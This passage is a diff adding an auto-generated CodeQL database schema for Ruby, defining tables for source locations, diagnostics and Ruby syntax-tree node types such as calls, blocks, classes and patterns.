b/ruby/ql/lib/upgrades/3595c826de6db850f16b9da265a54dbf24dd3126/old.dbscheme @@ -0,0 +1,1435 @@ +// CodeQL database schema for Ruby +// Automatically generated from the tree-sitter grammar; do not edit + +@location = @location_default + +locations_default( + unique int id: @location_default, + int file: @file ref, + int start_line: int ref, + int start_column: int ref, + int end_line: int ref, + int end_column: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +sourceLocationPrefix( + string prefix: string ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +case @diagnostic.severity of + 10 = @diagnostic_debug +| 20 = @diagnostic_info +| 30 = @diagnostic_warning +| 40 = @diagnostic_error +; + + +@ruby_underscore_arg = @ruby_assignment | @ruby_binary | @ruby_conditional | @ruby_operator_assignment | @ruby_range | @ruby_unary | @ruby_underscore_primary + +@ruby_underscore_call_operator = @ruby_reserved_word + +@ruby_underscore_expression = @ruby_assignment | @ruby_binary | @ruby_break | @ruby_call | @ruby_next | @ruby_operator_assignment | @ruby_return | @ruby_unary | @ruby_underscore_arg | @ruby_yield + +@ruby_underscore_lhs = @ruby_call | @ruby_element_reference | @ruby_scope_resolution | @ruby_token_false | @ruby_token_nil | @ruby_token_true | @ruby_underscore_variable + +@ruby_underscore_method_name = @ruby_delimited_symbol | @ruby_setter | @ruby_token_constant | @ruby_token_identifier | @ruby_token_operator | @ruby_token_simple_symbol | @ruby_underscore_nonlocal_variable + +@ruby_underscore_nonlocal_variable = @ruby_token_class_variable | @ruby_token_global_variable | @ruby_token_instance_variable + +@ruby_underscore_pattern_constant = @ruby_scope_resolution | @ruby_token_constant + +@ruby_underscore_pattern_expr = @ruby_alternative_pattern | @ruby_as_pattern | @ruby_underscore_pattern_expr_basic + +@ruby_underscore_pattern_expr_basic = @ruby_array_pattern | @ruby_expression_reference_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_parenthesized_pattern | @ruby_range | @ruby_token_identifier | @ruby_underscore_pattern_constant | @ruby_underscore_pattern_primitive | @ruby_variable_reference_pattern + +@ruby_underscore_pattern_primitive = @ruby_delimited_symbol | @ruby_lambda | @ruby_regex | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_encoding | @ruby_token_false | @ruby_token_file | @ruby_token_heredoc_beginning | @ruby_token_line | @ruby_token_nil | @ruby_token_self | @ruby_token_simple_symbol | @ruby_token_true | @ruby_unary | @ruby_underscore_simple_numeric + +@ruby_underscore_pattern_top_expr_body = @ruby_array_pattern | @ruby_find_pattern | @ruby_hash_pattern | @ruby_underscore_pattern_expr + +@ruby_underscore_primary = @ruby_array | @ruby_begin | @ruby_break | @ruby_call | @ruby_case__ | @ruby_case_match | @ruby_chained_string | @ruby_class | @ruby_delimited_symbol | @ruby_for | @ruby_hash | @ruby_if | @ruby_lambda | @ruby_method | @ruby_module | @ruby_next | @ruby_parenthesized_statements | @ruby_redo | @ruby_regex | @ruby_retry | @ruby_return | @ruby_singleton_class | @ruby_singleton_method | @ruby_string__ | @ruby_string_array | @ruby_subshell | @ruby_symbol_array | @ruby_token_character | @ruby_token_heredoc_beginning | @ruby_token_simple_symbol | @ruby_unary | @ruby_underscore_lhs | @ruby_underscore_simple_numeric | @ruby_unless | @ruby_until | @ruby_while | @ruby_yield + +@ruby_underscore_simple_numeric = @ruby_complex | @ruby_rational | @ruby_token_float | @ruby_token_integer + +@ruby_underscore_statement = @ruby_alias | @ruby_begin_block | @ruby_end_block | @ruby_if_modifier | @ruby_rescue_modifier | @ruby_undef | @ruby_underscore_expression | @ruby_unless_modifier | @ruby_until_modifier | @ruby_while_modifier + +@ruby_underscore_variable = @ruby_token_constant | @ruby_token_identifier | @ruby_token_self | @ruby_token_super | @ruby_underscore_nonlocal_variable + +ruby_alias_def( + unique int id: @ruby_alias, + int alias: @ruby_underscore_method_name ref, + int name: @ruby_underscore_method_name ref +); + +#keyset[ruby_alternative_pattern, index] +ruby_alternative_pattern_alternatives( + int ruby_alternative_pattern: @ruby_alternative_pattern ref, + int index: int ref, + unique int alternatives: @ruby_underscore_pattern_expr_basic ref +); + +ruby_alternative_pattern_def( + unique int id: @ruby_alternative_pattern +); + +@ruby_argument_list_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_argument_list, index] +ruby_argument_list_child( + int ruby_argument_list: @ruby_argument_list ref, + int index: int ref, + unique int child: @ruby_argument_list_child_type ref +); + +ruby_argument_list_def( + unique int id: @ruby_argument_list +); + +@ruby_array_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_array, index] +ruby_array_child( + int ruby_array: @ruby_array ref, + int index: int ref, + unique int child: @ruby_array_child_type ref +); + +ruby_array_def( + unique int id: @ruby_array +); + +ruby_array_pattern_class( + unique int ruby_array_pattern: @ruby_array_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_array_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_array_pattern, index] +ruby_array_pattern_child( + int ruby_array_pattern: @ruby_array_pattern ref, + int index: int ref, + unique int child: @ruby_array_pattern_child_type ref +); + +ruby_array_pattern_def( + unique int id: @ruby_array_pattern +); + +ruby_as_pattern_def( + unique int id: @ruby_as_pattern, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_pattern_expr ref +); + +@ruby_assignment_left_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +@ruby_assignment_right_type = @ruby_rescue_modifier | @ruby_right_assignment_list | @ruby_splat_argument | @ruby_underscore_expression + +ruby_assignment_def( + unique int id: @ruby_assignment, + int left: @ruby_assignment_left_type ref, + int right: @ruby_assignment_right_type ref +); + +@ruby_bare_string_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_string, index] +ruby_bare_string_child( + int ruby_bare_string: @ruby_bare_string ref, + int index: int ref, + unique int child: @ruby_bare_string_child_type ref +); + +ruby_bare_string_def( + unique int id: @ruby_bare_string +); + +@ruby_bare_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_bare_symbol, index] +ruby_bare_symbol_child( + int ruby_bare_symbol: @ruby_bare_symbol ref, + int index: int ref, + unique int child: @ruby_bare_symbol_child_type ref +); + +ruby_bare_symbol_def( + unique int id: @ruby_bare_symbol +); + +@ruby_begin_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin, index] +ruby_begin_child( + int ruby_begin: @ruby_begin ref, + int index: int ref, + unique int child: @ruby_begin_child_type ref +); + +ruby_begin_def( + unique int id: @ruby_begin +); + +@ruby_begin_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_begin_block, index] +ruby_begin_block_child( + int ruby_begin_block: @ruby_begin_block ref, + int index: int ref, + unique int child: @ruby_begin_block_child_type ref +); + +ruby_begin_block_def( + unique int id: @ruby_begin_block +); + +@ruby_binary_left_type = @ruby_underscore_expression | @ruby_underscore_simple_numeric + +case @ruby_binary.operator of + 0 = @ruby_binary_bangequal +| 1 = @ruby_binary_bangtilde +| 2 = @ruby_binary_percent +| 3 = @ruby_binary_ampersand +| 4 = @ruby_binary_ampersandampersand +| 5 = @ruby_binary_star +| 6 = @ruby_binary_starstar +| 7 = @ruby_binary_plus +| 8 = @ruby_binary_minus +| 9 = @ruby_binary_slash +| 10 = @ruby_binary_langle +| 11 = @ruby_binary_langlelangle +| 12 = @ruby_binary_langleequal +| 13 = @ruby_binary_langleequalrangle +| 14 = @ruby_binary_equalequal +| 15 = @ruby_binary_equalequalequal +| 16 = @ruby_binary_equaltilde +| 17 = @ruby_binary_rangle +| 18 = @ruby_binary_rangleequal +| 19 = @ruby_binary_ranglerangle +| 20 = @ruby_binary_caret +| 21 = @ruby_binary_and +| 22 = @ruby_binary_or +| 23 = @ruby_binary_pipe +| 24 = @ruby_binary_pipepipe +; + + +ruby_binary_def( + unique int id: @ruby_binary, + int left: @ruby_binary_left_type ref, + int operator: int ref, + int right: @ruby_underscore_expression ref +); + +ruby_block_body( + unique int ruby_block: @ruby_block ref, + unique int body: @ruby_block_body ref +); + +ruby_block_parameters( + unique int ruby_block: @ruby_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_block_def( + unique int id: @ruby_block +); + +ruby_block_argument_child( + unique int ruby_block_argument: @ruby_block_argument ref, + unique int child: @ruby_underscore_arg ref +); + +ruby_block_argument_def( + unique int id: @ruby_block_argument +); + +@ruby_block_body_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_block_body, index] +ruby_block_body_child( + int ruby_block_body: @ruby_block_body ref, + int index: int ref, + unique int child: @ruby_block_body_child_type ref +); + +ruby_block_body_def( + unique int id: @ruby_block_body +); + +ruby_block_parameter_name( + unique int ruby_block_parameter: @ruby_block_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_block_parameter_def( + unique int id: @ruby_block_parameter +); + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_locals( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int locals: @ruby_token_identifier ref +); + +@ruby_block_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_block_parameters, index] +ruby_block_parameters_child( + int ruby_block_parameters: @ruby_block_parameters ref, + int index: int ref, + unique int child: @ruby_block_parameters_child_type ref +); + +ruby_block_parameters_def( + unique int id: @ruby_block_parameters +); + +@ruby_body_statement_child_type = @ruby_else | @ruby_ensure | @ruby_rescue | @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_body_statement, index] +ruby_body_statement_child( + int ruby_body_statement: @ruby_body_statement ref, + int index: int ref, + unique int child: @ruby_body_statement_child_type ref +); + +ruby_body_statement_def( + unique int id: @ruby_body_statement +); + +ruby_break_child( + unique int ruby_break: @ruby_break ref, + unique int child: @ruby_argument_list ref +); + +ruby_break_def( + unique int id: @ruby_break +); + +ruby_call_arguments( + unique int ruby_call: @ruby_call ref, + unique int arguments: @ruby_argument_list ref +); + +@ruby_call_block_type = @ruby_block | @ruby_do_block + +ruby_call_block( + unique int ruby_call: @ruby_call ref, + unique int block: @ruby_call_block_type ref +); + +@ruby_call_method_type = @ruby_token_operator | @ruby_underscore_variable + +ruby_call_method( + unique int ruby_call: @ruby_call ref, + unique int method: @ruby_call_method_type ref +); + +ruby_call_operator( + unique int ruby_call: @ruby_call ref, + unique int operator: @ruby_underscore_call_operator ref +); + +ruby_call_receiver( + unique int ruby_call: @ruby_call ref, + unique int receiver: @ruby_underscore_primary ref +); + +ruby_call_def( + unique int id: @ruby_call +); + +ruby_case_value( + unique int ruby_case__: @ruby_case__ ref, + unique int value: @ruby_underscore_statement ref +); + +@ruby_case_child_type = @ruby_else | @ruby_when + +#keyset[ruby_case__, index] +ruby_case_child( + int ruby_case__: @ruby_case__ ref, + int index: int ref, + unique int child: @ruby_case_child_type ref +); + +ruby_case_def( + unique int id: @ruby_case__ +); + +#keyset[ruby_case_match, index] +ruby_case_match_clauses( + int ruby_case_match: @ruby_case_match ref, + int index: int ref, + unique int clauses: @ruby_in_clause ref +); + +ruby_case_match_else( + unique int ruby_case_match: @ruby_case_match ref, + unique int else: @ruby_else ref +); + +ruby_case_match_def( + unique int id: @ruby_case_match, + int value: @ruby_underscore_statement ref +); + +#keyset[ruby_chained_string, index] +ruby_chained_string_child( + int ruby_chained_string: @ruby_chained_string ref, + int index: int ref, + unique int child: @ruby_string__ ref +); + +ruby_chained_string_def( + unique int id: @ruby_chained_string +); + +ruby_class_body( + unique int ruby_class: @ruby_class ref, + unique int body: @ruby_body_statement ref +); + +@ruby_class_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_class_superclass( + unique int ruby_class: @ruby_class ref, + unique int superclass: @ruby_superclass ref +); + +ruby_class_def( + unique int id: @ruby_class, + int name: @ruby_class_name_type ref +); + +@ruby_complex_child_type = @ruby_rational | @ruby_token_float | @ruby_token_integer + +ruby_complex_def( + unique int id: @ruby_complex, + int child: @ruby_complex_child_type ref +); + +ruby_conditional_def( + unique int id: @ruby_conditional, + int alternative: @ruby_underscore_arg ref, + int condition: @ruby_underscore_arg ref, + int consequence: @ruby_underscore_arg ref +); + +@ruby_delimited_symbol_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_delimited_symbol, index] +ruby_delimited_symbol_child( + int ruby_delimited_symbol: @ruby_delimited_symbol ref, + int index: int ref, + unique int child: @ruby_delimited_symbol_child_type ref +); + +ruby_delimited_symbol_def( + unique int id: @ruby_delimited_symbol +); + +@ruby_destructured_left_assignment_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_destructured_left_assignment, index] +ruby_destructured_left_assignment_child( + int ruby_destructured_left_assignment: @ruby_destructured_left_assignment ref, + int index: int ref, + unique int child: @ruby_destructured_left_assignment_child_type ref +); + +ruby_destructured_left_assignment_def( + unique int id: @ruby_destructured_left_assignment +); + +@ruby_destructured_parameter_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_destructured_parameter, index] +ruby_destructured_parameter_child( + int ruby_destructured_parameter: @ruby_destructured_parameter ref, + int index: int ref, + unique int child: @ruby_destructured_parameter_child_type ref +); + +ruby_destructured_parameter_def( + unique int id: @ruby_destructured_parameter +); + +@ruby_do_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_do, index] +ruby_do_child( + int ruby_do: @ruby_do ref, + int index: int ref, + unique int child: @ruby_do_child_type ref +); + +ruby_do_def( + unique int id: @ruby_do +); + +ruby_do_block_body( + unique int ruby_do_block: @ruby_do_block ref, + unique int body: @ruby_body_statement ref +); + +ruby_do_block_parameters( + unique int ruby_do_block: @ruby_do_block ref, + unique int parameters: @ruby_block_parameters ref +); + +ruby_do_block_def( + unique int id: @ruby_do_block +); + +@ruby_element_reference_child_type = @ruby_block_argument | @ruby_hash_splat_argument | @ruby_pair | @ruby_splat_argument | @ruby_token_forward_argument | @ruby_underscore_expression + +#keyset[ruby_element_reference, index] +ruby_element_reference_child( + int ruby_element_reference: @ruby_element_reference ref, + int index: int ref, + unique int child: @ruby_element_reference_child_type ref +); + +ruby_element_reference_def( + unique int id: @ruby_element_reference, + int object: @ruby_underscore_primary ref +); + +@ruby_else_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_else, index] +ruby_else_child( + int ruby_else: @ruby_else ref, + int index: int ref, + unique int child: @ruby_else_child_type ref +); + +ruby_else_def( + unique int id: @ruby_else +); + +@ruby_elsif_alternative_type = @ruby_else | @ruby_elsif + +ruby_elsif_alternative( + unique int ruby_elsif: @ruby_elsif ref, + unique int alternative: @ruby_elsif_alternative_type ref +); + +ruby_elsif_consequence( + unique int ruby_elsif: @ruby_elsif ref, + unique int consequence: @ruby_then ref +); + +ruby_elsif_def( + unique int id: @ruby_elsif, + int condition: @ruby_underscore_statement ref +); + +@ruby_end_block_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_end_block, index] +ruby_end_block_child( + int ruby_end_block: @ruby_end_block ref, + int index: int ref, + unique int child: @ruby_end_block_child_type ref +); + +ruby_end_block_def( + unique int id: @ruby_end_block +); + +@ruby_ensure_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_ensure, index] +ruby_ensure_child( + int ruby_ensure: @ruby_ensure ref, + int index: int ref, + unique int child: @ruby_ensure_child_type ref +); + +ruby_ensure_def( + unique int id: @ruby_ensure +); + +ruby_exception_variable_def( + unique int id: @ruby_exception_variable, + int child: @ruby_underscore_lhs ref +); + +@ruby_exceptions_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_exceptions, index] +ruby_exceptions_child( + int ruby_exceptions: @ruby_exceptions ref, + int index: int ref, + unique int child: @ruby_exceptions_child_type ref +); + +ruby_exceptions_def( + unique int id: @ruby_exceptions +); + +ruby_expression_reference_pattern_def( + unique int id: @ruby_expression_reference_pattern, + int value: @ruby_underscore_expression ref +); + +ruby_find_pattern_class( + unique int ruby_find_pattern: @ruby_find_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_find_pattern_child_type = @ruby_splat_parameter | @ruby_underscore_pattern_expr + +#keyset[ruby_find_pattern, index] +ruby_find_pattern_child( + int ruby_find_pattern: @ruby_find_pattern ref, + int index: int ref, + unique int child: @ruby_find_pattern_child_type ref +); + +ruby_find_pattern_def( + unique int id: @ruby_find_pattern +); + +@ruby_for_pattern_type = @ruby_left_assignment_list | @ruby_underscore_lhs + +ruby_for_def( + unique int id: @ruby_for, + int body: @ruby_do ref, + int pattern: @ruby_for_pattern_type ref, + int value: @ruby_in ref +); + +@ruby_hash_child_type = @ruby_hash_splat_argument | @ruby_pair + +#keyset[ruby_hash, index] +ruby_hash_child( + int ruby_hash: @ruby_hash ref, + int index: int ref, + unique int child: @ruby_hash_child_type ref +); + +ruby_hash_def( + unique int id: @ruby_hash +); + +ruby_hash_pattern_class( + unique int ruby_hash_pattern: @ruby_hash_pattern ref, + unique int class: @ruby_underscore_pattern_constant ref +); + +@ruby_hash_pattern_child_type = @ruby_hash_splat_parameter | @ruby_keyword_pattern | @ruby_token_hash_splat_nil + +#keyset[ruby_hash_pattern, index] +ruby_hash_pattern_child( + int ruby_hash_pattern: @ruby_hash_pattern ref, + int index: int ref, + unique int child: @ruby_hash_pattern_child_type ref +); + +ruby_hash_pattern_def( + unique int id: @ruby_hash_pattern +); + +ruby_hash_splat_argument_def( + unique int id: @ruby_hash_splat_argument, + int child: @ruby_underscore_arg ref +); + +ruby_hash_splat_parameter_name( + unique int ruby_hash_splat_parameter: @ruby_hash_splat_parameter ref, + unique int name: @ruby_token_identifier ref +); + +ruby_hash_splat_parameter_def( + unique int id: @ruby_hash_splat_parameter +); + +@ruby_heredoc_body_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_heredoc_content | @ruby_token_heredoc_end + +#keyset[ruby_heredoc_body, index] +ruby_heredoc_body_child( + int ruby_heredoc_body: @ruby_heredoc_body ref, + int index: int ref, + unique int child: @ruby_heredoc_body_child_type ref +); + +ruby_heredoc_body_def( + unique int id: @ruby_heredoc_body +); + +@ruby_if_alternative_type = @ruby_else | @ruby_elsif + +ruby_if_alternative( + unique int ruby_if: @ruby_if ref, + unique int alternative: @ruby_if_alternative_type ref +); + +ruby_if_consequence( + unique int ruby_if: @ruby_if ref, + unique int consequence: @ruby_then ref +); + +ruby_if_def( + unique int id: @ruby_if, + int condition: @ruby_underscore_statement ref +); + +ruby_if_guard_def( + unique int id: @ruby_if_guard, + int condition: @ruby_underscore_expression ref +); + +ruby_if_modifier_def( + unique int id: @ruby_if_modifier, + int body: @ruby_underscore_statement ref, + int condition: @ruby_underscore_expression ref +); + +ruby_in_def( + unique int id: @ruby_in, + int child: @ruby_underscore_arg ref +); + +ruby_in_clause_body( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int body: @ruby_then ref +); + +@ruby_in_clause_guard_type = @ruby_if_guard | @ruby_unless_guard + +ruby_in_clause_guard( + unique int ruby_in_clause: @ruby_in_clause ref, + unique int guard: @ruby_in_clause_guard_type ref +); + +ruby_in_clause_def( + unique int id: @ruby_in_clause, + int pattern: @ruby_underscore_pattern_top_expr_body ref +); + +@ruby_interpolation_child_type = @ruby_token_empty_statement | @ruby_underscore_nonlocal_variable | @ruby_underscore_statement + +#keyset[ruby_interpolation, index] +ruby_interpolation_child( + int ruby_interpolation: @ruby_interpolation ref, + int index: int ref, + unique int child: @ruby_interpolation_child_type ref +); + +ruby_interpolation_def( + unique int id: @ruby_interpolation +); + +ruby_keyword_parameter_value( + unique int ruby_keyword_parameter: @ruby_keyword_parameter ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_keyword_parameter_def( + unique int id: @ruby_keyword_parameter, + int name: @ruby_token_identifier ref +); + +@ruby_keyword_pattern_key_type = @ruby_string__ | @ruby_token_hash_key_symbol + +ruby_keyword_pattern_value( + unique int ruby_keyword_pattern: @ruby_keyword_pattern ref, + unique int value: @ruby_underscore_pattern_expr ref +); + +ruby_keyword_pattern_def( + unique int id: @ruby_keyword_pattern, + int key__: @ruby_keyword_pattern_key_type ref +); + +@ruby_lambda_body_type = @ruby_block | @ruby_do_block + +ruby_lambda_parameters( + unique int ruby_lambda: @ruby_lambda ref, + unique int parameters: @ruby_lambda_parameters ref +); + +ruby_lambda_def( + unique int id: @ruby_lambda, + int body: @ruby_lambda_body_type ref +); + +@ruby_lambda_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_lambda_parameters, index] +ruby_lambda_parameters_child( + int ruby_lambda_parameters: @ruby_lambda_parameters ref, + int index: int ref, + unique int child: @ruby_lambda_parameters_child_type ref +); + +ruby_lambda_parameters_def( + unique int id: @ruby_lambda_parameters +); + +@ruby_left_assignment_list_child_type = @ruby_destructured_left_assignment | @ruby_rest_assignment | @ruby_underscore_lhs + +#keyset[ruby_left_assignment_list, index] +ruby_left_assignment_list_child( + int ruby_left_assignment_list: @ruby_left_assignment_list ref, + int index: int ref, + unique int child: @ruby_left_assignment_list_child_type ref +); + +ruby_left_assignment_list_def( + unique int id: @ruby_left_assignment_list +); + +@ruby_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_method_body( + unique int ruby_method: @ruby_method ref, + unique int body: @ruby_method_body_type ref +); + +ruby_method_parameters( + unique int ruby_method: @ruby_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_method_def( + unique int id: @ruby_method, + int name: @ruby_underscore_method_name ref +); + +@ruby_method_parameters_child_type = @ruby_block_parameter | @ruby_destructured_parameter | @ruby_hash_splat_parameter | @ruby_keyword_parameter | @ruby_optional_parameter | @ruby_splat_parameter | @ruby_token_forward_parameter | @ruby_token_hash_splat_nil | @ruby_token_identifier + +#keyset[ruby_method_parameters, index] +ruby_method_parameters_child( + int ruby_method_parameters: @ruby_method_parameters ref, + int index: int ref, + unique int child: @ruby_method_parameters_child_type ref +); + +ruby_method_parameters_def( + unique int id: @ruby_method_parameters +); + +ruby_module_body( + unique int ruby_module: @ruby_module ref, + unique int body: @ruby_body_statement ref +); + +@ruby_module_name_type = @ruby_scope_resolution | @ruby_token_constant + +ruby_module_def( + unique int id: @ruby_module, + int name: @ruby_module_name_type ref +); + +ruby_next_child( + unique int ruby_next: @ruby_next ref, + unique int child: @ruby_argument_list ref +); + +ruby_next_def( + unique int id: @ruby_next +); + +case @ruby_operator_assignment.operator of + 0 = @ruby_operator_assignment_percentequal +| 1 = @ruby_operator_assignment_ampersandampersandequal +| 2 = @ruby_operator_assignment_ampersandequal +| 3 = @ruby_operator_assignment_starstarequal +| 4 = @ruby_operator_assignment_starequal +| 5 = @ruby_operator_assignment_plusequal +| 6 = @ruby_operator_assignment_minusequal +| 7 = @ruby_operator_assignment_slashequal +| 8 = @ruby_operator_assignment_langlelangleequal +| 9 = @ruby_operator_assignment_ranglerangleequal +| 10 = @ruby_operator_assignment_caretequal +| 11 = @ruby_operator_assignment_pipeequal +| 12 = @ruby_operator_assignment_pipepipeequal +; + + +@ruby_operator_assignment_right_type = @ruby_rescue_modifier | @ruby_underscore_expression + +ruby_operator_assignment_def( + unique int id: @ruby_operator_assignment, + int left: @ruby_underscore_lhs ref, + int operator: int ref, + int right: @ruby_operator_assignment_right_type ref +); + +ruby_optional_parameter_def( + unique int id: @ruby_optional_parameter, + int name: @ruby_token_identifier ref, + int value: @ruby_underscore_arg ref +); + +@ruby_pair_key_type = @ruby_string__ | @ruby_token_hash_key_symbol | @ruby_underscore_arg + +ruby_pair_value( + unique int ruby_pair: @ruby_pair ref, + unique int value: @ruby_underscore_arg ref +); + +ruby_pair_def( + unique int id: @ruby_pair, + int key__: @ruby_pair_key_type ref +); + +ruby_parenthesized_pattern_def( + unique int id: @ruby_parenthesized_pattern, + int child: @ruby_underscore_pattern_expr ref +); + +@ruby_parenthesized_statements_child_type = @ruby_token_empty_statement | @ruby_underscore_statement + +#keyset[ruby_parenthesized_statements, index] +ruby_parenthesized_statements_child( + int ruby_parenthesized_statements: @ruby_parenthesized_statements ref, + int index: int ref, + unique int child: @ruby_parenthesized_statements_child_type ref +); + +ruby_parenthesized_statements_def( + unique int id: @ruby_parenthesized_statements +); + +@ruby_pattern_child_type = @ruby_splat_argument | @ruby_underscore_arg + +ruby_pattern_def( + unique int id: @ruby_pattern, + int child: @ruby_pattern_child_type ref +); + +@ruby_program_child_type = @ruby_token_empty_statement | @ruby_token_uninterpreted | @ruby_underscore_statement + +#keyset[ruby_program, index] +ruby_program_child( + int ruby_program: @ruby_program ref, + int index: int ref, + unique int child: @ruby_program_child_type ref +); + +ruby_program_def( + unique int id: @ruby_program +); + +@ruby_range_begin_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_begin( + unique int ruby_range: @ruby_range ref, + unique int begin: @ruby_range_begin_type ref +); + +@ruby_range_end_type = @ruby_underscore_arg | @ruby_underscore_pattern_primitive + +ruby_range_end( + unique int ruby_range: @ruby_range ref, + unique int end: @ruby_range_end_type ref +); + +case @ruby_range.operator of + 0 = @ruby_range_dotdot +| 1 = @ruby_range_dotdotdot +; + + +ruby_range_def( + unique int id: @ruby_range, + int operator: int ref +); + +@ruby_rational_child_type = @ruby_token_float | @ruby_token_integer + +ruby_rational_def( + unique int id: @ruby_rational, + int child: @ruby_rational_child_type ref +); + +ruby_redo_child( + unique int ruby_redo: @ruby_redo ref, + unique int child: @ruby_argument_list ref +); + +ruby_redo_def( + unique int id: @ruby_redo +); + +@ruby_regex_child_type = @ruby_interpolation | @ruby_token_escape_sequence | @ruby_token_string_content + +#keyset[ruby_regex, index] +ruby_regex_child( + int ruby_regex: @ruby_regex ref, + int index: int ref, + unique int child: @ruby_regex_child_type ref +); + +ruby_regex_def( + unique int id: @ruby_regex +); + +ruby_rescue_body( + unique int ruby_rescue: @ruby_rescue ref, + unique int body: @ruby_then ref +); + +ruby_rescue_exceptions( + unique int ruby_rescue: @ruby_rescue ref, + unique int exceptions: @ruby_exceptions ref +); + +ruby_rescue_variable( + unique int ruby_rescue: @ruby_rescue ref, + unique int variable: @ruby_exception_variable ref +); + +ruby_rescue_def( + unique int id: @ruby_rescue +); + +@ruby_rescue_modifier_body_type = @ruby_underscore_arg | @ruby_underscore_statement + +ruby_rescue_modifier_def( + unique int id: @ruby_rescue_modifier, + int body: @ruby_rescue_modifier_body_type ref, + int handler: @ruby_underscore_expression ref +); + +ruby_rest_assignment_child( + unique int ruby_rest_assignment: @ruby_rest_assignment ref, + unique int child: @ruby_underscore_lhs ref +); + +ruby_rest_assignment_def( + unique int id: @ruby_rest_assignment +); + +ruby_retry_child( + unique int ruby_retry: @ruby_retry ref, + unique int child: @ruby_argument_list ref +); + +ruby_retry_def( + unique int id: @ruby_retry +); + +ruby_return_child( + unique int ruby_return: @ruby_return ref, + unique int child: @ruby_argument_list ref +); + +ruby_return_def( + unique int id: @ruby_return +); + +@ruby_right_assignment_list_child_type = @ruby_splat_argument | @ruby_underscore_arg + +#keyset[ruby_right_assignment_list, index] +ruby_right_assignment_list_child( + int ruby_right_assignment_list: @ruby_right_assignment_list ref, + int index: int ref, + unique int child: @ruby_right_assignment_list_child_type ref +); + +ruby_right_assignment_list_def( + unique int id: @ruby_right_assignment_list +); + +@ruby_scope_resolution_scope_type = @ruby_underscore_pattern_constant | @ruby_underscore_primary + +ruby_scope_resolution_scope( + unique int ruby_scope_resolution: @ruby_scope_resolution ref, + unique int scope: @ruby_scope_resolution_scope_type ref +); + +ruby_scope_resolution_def( + unique int id: @ruby_scope_resolution, + int name: @ruby_token_constant ref +); + +ruby_setter_def( + unique int id: @ruby_setter, + int name: @ruby_token_identifier ref +); + +ruby_singleton_class_body( + unique int ruby_singleton_class: @ruby_singleton_class ref, + unique int body: @ruby_body_statement ref +); + +ruby_singleton_class_def( + unique int id: @ruby_singleton_class, + int value: @ruby_underscore_arg ref +); + +@ruby_singleton_method_body_type = @ruby_body_statement | @ruby_rescue_modifier | @ruby_underscore_arg + +ruby_singleton_method_body( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int body: @ruby_singleton_method_body_type ref +); + +@ruby_singleton_method_object_type = @ruby_underscore_arg | @ruby_underscore_variable + +ruby_singleton_method_parameters( + unique int ruby_singleton_method: @ruby_singleton_method ref, + unique int parameters: @ruby_method_parameters ref +); + +ruby_singleton_method_def( + unique int id: @ruby_singleton_method, + int name: @ruby_underscore_method_name ref, + int object: @ruby_singleton_method_object_type ref +); + +ruby_splat_argument_def( + unique int id: @ruby_splat_argument, + int child: @ruby_underscore_arg ref +); + 